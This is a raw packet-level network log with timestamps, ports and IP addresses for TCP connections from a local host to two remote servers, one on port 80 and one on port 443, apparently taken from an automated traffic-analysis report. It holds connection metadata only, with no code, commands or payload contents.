                                                          Dec 24, 2024 02:18:22.908452034 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.910434008 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.910644054 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.910738945 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.912765980 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.912981033 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.913059950 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.915103912 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.915306091 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.915657043 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.917453051 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.917654991 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.918219090 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.919795036 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.920013905 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.920965910 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.922154903 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.922348022 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.922472000 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.924438000 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.924666882 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.924740076 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.926808119 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.927016020 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.927058935 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.929223061 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.929442883 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.929790020 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.931473017 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.931729078 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.931927919 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.933787107 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.934016943 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.934614897 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.936115026 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.936347961 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.937141895 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:22.938442945 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:22.987140894 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.002558947 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.002763033 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.002825022 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.003462076 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.003599882 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.003726959 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.004730940 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.004941940 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.005033016 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.006390095 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.006623030 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.006721020 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.008090019 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.008308887 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.008441925 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.009749889 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.009979010 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.010036945 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.011413097 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.011635065 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.011754036 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.013025999 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.013250113 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.013524055 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.014651060 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.014861107 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.015089989 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.016362906 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.016583920 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.017529964 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.017909050 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.018134117 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.018790007 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.019418955 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.019614935 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.019732952 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.021019936 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.021223068 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.021513939 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.022536039 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.022897005 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.023426056 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.024063110 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.024276018 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.024513006 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.025527000 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.025784016 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.025890112 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.027014017 CET8049711147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:23.080816031 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:23.131738901 CET49715443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:23.478689909 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:23.478840113 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:23.536958933 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:23.536993027 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:23.537344933 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:23.540431023 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:23.540472031 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:23.540553093 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.238055944 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.238125086 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.238171101 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.238197088 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.238750935 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.238795996 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.238804102 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.240434885 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.240583897 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.240591049 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.246320009 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.247293949 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.247302055 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.254621029 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.254674911 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.254681110 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.299541950 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.299552917 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.346424103 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.429805994 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.433760881 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.433811903 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.433825016 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.433931112 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.433974981 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.433980942 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.434025049 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.434070110 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.435122967 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.435139894 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.435151100 CET49716443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.435157061 CET44349716172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.569530964 CET49717443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.569581032 CET44349717172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.569645882 CET49717443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.574362040 CET49717443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.574373960 CET44349717172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.823196888 CET49718443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.823240995 CET44349718172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.823481083 CET49718443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.830228090 CET49718443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:24.830245972 CET44349718172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:24.851176023 CET4971180192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:25.786341906 CET44349717172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:25.786582947 CET49717443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:25.789530993 CET49717443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:25.789541006 CET44349717172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:25.789798975 CET44349717172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:25.791459084 CET49717443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:25.791459084 CET49717443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:25.791660070 CET44349717172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:26.049552917 CET44349718172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:26.049767017 CET49718443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:26.050985098 CET49718443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:26.050997972 CET44349718172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:26.051223040 CET44349718172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:26.090673923 CET49718443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:26.090673923 CET49718443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:26.090766907 CET44349718172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:26.799408913 CET44349718172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:26.799513102 CET44349718172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:26.799561977 CET49718443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:26.800256968 CET49718443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:26.800271988 CET44349718172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:26.809572935 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:26.809612036 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:26.809667110 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:26.810038090 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:26.810049057 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:26.991890907 CET44349717172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:26.991986990 CET44349717172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:26.992036104 CET49717443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:26.992208004 CET49717443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:26.992219925 CET44349717172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:27.027795076 CET49720443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:27.027846098 CET44349720172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:27.027903080 CET49720443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:27.037587881 CET49720443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:27.037602901 CET44349720172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.028935909 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.029001951 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.030414104 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.030431032 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.030667067 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.032188892 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.032208920 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.032260895 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.253289938 CET44349720172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.253360033 CET49720443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.258976936 CET49720443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.259001970 CET44349720172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.259363890 CET44349720172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.261182070 CET49720443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.261476040 CET49720443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.261507034 CET44349720172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.261593103 CET49720443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.303330898 CET44349720172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.794717073 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.794770002 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.794919014 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.794939041 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.796215057 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.796243906 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.796267033 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.796274900 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.796318054 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.802881002 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.811598063 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.811649084 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.811656952 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.820796967 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.820851088 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.820858002 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.914477110 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.914621115 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.914640903 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.990619898 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.990693092 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.990700006 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.990715027 CET44349719172.67.195.241192.168.2.8
                                                          Dec 24, 2024 02:18:28.990756989 CET49719443192.168.2.8172.67.195.241
                                                          Dec 24, 2024 02:18:28.990768909 CET44349719172.67.195.241192.168.2.8
Dec 24, 2024 02:18:28.990807056 CET | 443 | 49719 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:28.990974903 CET | 49719 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:28.991000891 CET | 443 | 49719 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:28.991012096 CET | 49719 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:28.991012096 CET | 49719 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:28.991019964 CET | 443 | 49719 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:28.991029024 CET | 443 | 49719 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:29.360996008 CET | 443 | 49720 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:29.361103058 CET | 443 | 49720 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:29.361166954 CET | 49720 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:29.364305019 CET | 49720 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:29.364345074 CET | 443 | 49720 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:29.434879065 CET | 49721 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:29.434932947 CET | 443 | 49721 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:29.434998989 CET | 49721 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:29.435301065 CET | 49721 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:29.435319901 CET | 443 | 49721 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:30.647207975 CET | 443 | 49721 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:30.647319078 CET | 49721 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:30.648780107 CET | 49721 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:30.648796082 CET | 443 | 49721 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:30.649039984 CET | 443 | 49721 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:30.650088072 CET | 49721 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:30.650216103 CET | 49721 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:30.650247097 CET | 443 | 49721 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:30.650305033 CET | 49721 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:30.650316954 CET | 443 | 49721 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:31.614530087 CET | 443 | 49721 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:31.614629030 CET | 443 | 49721 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:31.614680052 CET | 49721 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:31.614793062 CET | 49721 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:31.614811897 CET | 443 | 49721 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:31.796035051 CET | 49722 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:31.796134949 CET | 443 | 49722 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:31.796238899 CET | 49722 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:31.796616077 CET | 49722 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:31.796665907 CET | 443 | 49722 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:31.797786951 CET | 49723 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:31.797888041 CET | 443 | 49723 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:31.797980070 CET | 49723 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:31.798224926 CET | 49723 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:31.798255920 CET | 443 | 49723 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:33.014862061 CET | 443 | 49723 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:33.014934063 CET | 49723 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:33.016072989 CET | 443 | 49722 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:33.016138077 CET | 49723 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:33.016149044 CET | 443 | 49723 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:33.016176939 CET | 49722 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:33.016386032 CET | 443 | 49723 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:33.017102003 CET | 49722 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:33.017112970 CET | 443 | 49722 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:33.017369032 CET | 443 | 49722 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:33.018172026 CET | 49723 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:33.018326044 CET | 49723 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:33.018347025 CET | 443 | 49723 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:33.019615889 CET | 49722 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:33.019706964 CET | 49722 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:33.019711971 CET | 443 | 49722 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:33.836894989 CET | 443 | 49722 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:33.837033033 CET | 443 | 49722 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:33.837124109 CET | 49722 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:33.837321043 CET | 49722 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:33.837338924 CET | 443 | 49722 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:34.121556997 CET | 443 | 49723 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:34.121659040 CET | 443 | 49723 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:34.121772051 CET | 49723 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:34.126111031 CET | 49723 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:34.126130104 CET | 443 | 49723 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:34.128248930 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:34.128283024 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:34.128403902 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:34.128751040 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:34.128762007 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:34.140499115 CET | 49725 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:34.140537977 CET | 443 | 49725 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:34.140609980 CET | 49725 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:34.140904903 CET | 49725 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:34.140917063 CET | 443 | 49725 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.342602968 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.342679977 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.343811989 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.343836069 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.344095945 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.345165014 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.345864058 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.345900059 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.345999956 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.346038103 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.346122980 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.346173048 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.346271038 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.346297026 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.346425056 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.346446991 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.346564054 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.346589088 CET | 443 | 49724 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.346599102 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.346920013 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.346951008 CET | 49724 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.354058027 CET | 443 | 49725 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.354172945 CET | 49725 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.355269909 CET | 49725 | 443 | 192.168.2.8 | 172.67.195.241
Dec 24, 2024 02:18:35.355277061 CET | 443 | 49725 | 172.67.195.241 | 192.168.2.8
Dec 24, 2024 02:18:35.355546951 CET | 443 | 49725 | 172.67.195.241 | 192.168.2.8
